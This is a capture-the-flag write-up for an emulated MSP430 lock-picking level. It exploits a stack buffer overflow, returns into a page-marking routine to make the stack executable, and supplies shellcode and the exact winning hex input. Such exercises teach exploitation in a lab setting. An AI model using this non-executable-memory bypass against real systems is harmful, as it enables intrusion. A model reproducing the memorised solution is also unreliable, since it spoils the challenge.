This level introduces <set_up_protection> to enable memory protection.

We can immediately identify that there is a stack buffer overflow tied to the input. This grants us control of the PC / Return Address.

Hex Input: 0102030405060708090a0b0c0d0e0f101112

pc: 1211

Now that we have control of the PC, we need to trigger the 0x7f interrupt to solve the level.

We can write our unlock shellcode onto the stack, however the memory page where it is located has not been marked as executable. So we will not be able to immediately return to our unlock shellcode.

Instead we need to return into <mark_page_executable> to mark the location of our shellcode as executable.

Our input on the stack begins at 0x3fee in page 0x3f** and continues into 0x40** after our overflowed return address. We will place the shellcode at 0x3f** since it allows for a smaller input.

We cannot return directly to the start of <mark_page_executable> since it is using r15 as the memory page location argument. We do not have direct control of r15 however we can setup the stack ourselves and return into 44ba: 3180 0600 sub #0x6, sp.

When <mark_page_executable> finishes, it performs add #0xa, sp and ret which we can control to return into our shellcode located at 0x3fee.

Shellcode: 
mov #0xff00,sr
mov #0x10,pc

Assembled: 324000ff30401000

The value #0xff00 is the final value of sr when 0x7f is provided as an argument to the <INT> function in previous levels.

Our winning input is: 324000ff304010004141414141414141ba443f000000ee3f